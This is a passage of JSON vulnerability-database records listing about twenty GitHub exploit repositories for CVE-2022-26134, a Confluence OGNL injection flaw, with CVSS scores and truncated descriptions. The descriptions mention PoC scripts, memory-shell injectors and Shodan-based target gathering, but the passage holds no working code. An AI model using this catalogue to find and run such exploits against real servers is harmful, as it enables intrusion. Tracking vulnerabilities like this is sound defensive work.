"bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-29T13:45:18", "id": "F0CF90CD-DC6E-5F0F-AD61-5E1694700F32", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:18:33", "description": "## CVE-2022-26134_RCE\n\n## \u5b89\u88c5\n\n```\ngit clone https://github.com/y...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-15T06:01:53", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-15T14:34:57", "id": "252F889F-2BFB-5D8D-B1CD-63075FB7EC34", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:19:53", "description": "## CVE-2022-26134\n\n## \u5b89\u88c5\n\n```\n\u4e0b\u8f7dpy,\u672c\u5730cmd\u8fd0\u884c\n```\n\n## \u4f7f\u7528\n\npoc\n\n```\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-16T11:37:33", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-16T12:03:51", "id": "321617C5-08C5-5919-9510-2571831D052E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:29:59", "description": "pip3 install -r require...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-08T12:24:21", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-11-09T18:16:01", "id": "35830627-EBEC-59C8-A142-2F06CCF8EA5B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:30:11", "description": "### CVE-2022-26134 - OGNL injection vulnerability:\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-05T07:04:50", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-10T08:52:10", "id": "DBAD59E8-9E48-5D54-92A0-AAD5B57C39F6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:10:54", "description": "# CVE-2022-26134_check\n\nThe script is used to check remotely if ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-15T20:11:27", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-01-19T23:43:17", "id": "B6182C52-78F5-58BC-8D3F-EF87D0239F0E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:18:23", "description": "## **CVE-2022-26134**\n## ATLASSIAN-Confluence RCE\n## \u5b89\u88c5\n\n```\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-16T10:44:51", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-18T09:07:52", "id": "B8347185-A0AD-5C98-B2DB-599D8BE5EF53", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:18:09", "description": "## ATLASSIAN-Confluence_rce\nCVE-2022-26134\n## \u5b89\u88c5\n\n```\ngit clone ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-16T09:19:56", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-17T06:36:47", "id": "1F907E1E-A975-55B6-BAFC-80A32B2DDAE7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:17:03", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-24T19:00:25", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-02-09T19:30:02", "id": "506F4ED7-477B-50E3-9250-1C6A31D8C357", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:09:59", "description": "# CVE-2022-26134_Behinder_MemShell\n\n\u539f\u9879\u76ee\u5730\u5740:...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-04T06:51:47", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-02-19T08:50:35", "id": "594C33E1-9EBF-5B3B-BA76-031ACB500518", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:32:59", "description": "# [-] CVE-2022-26134 - Confluence Pre-Auth Remote Code Execution...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-13T23:01:39", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-04-14T16:51:35", "id": "FD4859A0-D69F-503C-BFDB-0C9025BDC68F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:25", "description": "# confluencePot\n\nConfluencePot is a simple honeypot for the Atla...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T15:44:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-04-18T08:06:55", "id": "BAEE7CC9-E997-5B82-A169-AB56B635CC1D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:12", "description": "# CVE-2022-26134\n \n -u URL, --url URL \u76ee\u6807url\n \n -c COMM...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T02:11:58", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-01-31T13:06:36", "id": "12691014-3333-5741-80A4-3357BD72D2AC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:31", "description": "# CVE-2022-2613...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T02:16:56", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T02:20:41", "id": "C9B0311C-F06D-5438-B36E-36DCE5FE691D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:29", "description": "# CVE-2022-26134 POC\n\n## Description\n```\nIn affected versions of...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T10:36:11", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-03-06T10:20:57", "id": "54DD3775-9F3C-54DF-93EF-372304E8EE4B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:29", "description": "# CVE-2022-26134-Godzilla-MEMSHELL\n\n## Usage\n```\njava -jar CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T09:19:02", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-06-05T10:57:05", "id": "65AEB692-CDF9-53FB-B13F-CAB5A4288606", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:42", "description": "# CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T18:23:20", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-05T23:03:16", "id": "09477170-A03D-5C2D-AC41-0D0A8F51EDB3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:32", "description": "# CVE-2022-26134\nImplementation of CVE-2022-26134\n\nThis reposito...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T08:58:07", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T09:21:42", "id": "1A808CE9-B43C-50A7-A06E-75B3C5A7D5AC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:38", "description": "# Confluence Pre-Auth Remote Code Execution via OGNL Injection (...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T02:43:06", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-04-01T10:43:08", "id": "B47171B0-339A-582E-8AAC-3B18373664B7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:38", "description": "# CVE-2022-26134\n\n1) First run the shodan scripts to grabs all t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T20:35:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-12T18:28:08", "id": "7BE60530-0495-5366-846A-73B1A778DBDA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:39", "description": "# Confluence-CVE-2022-26134\n...", "cvss3": {"exploitabilityScore": 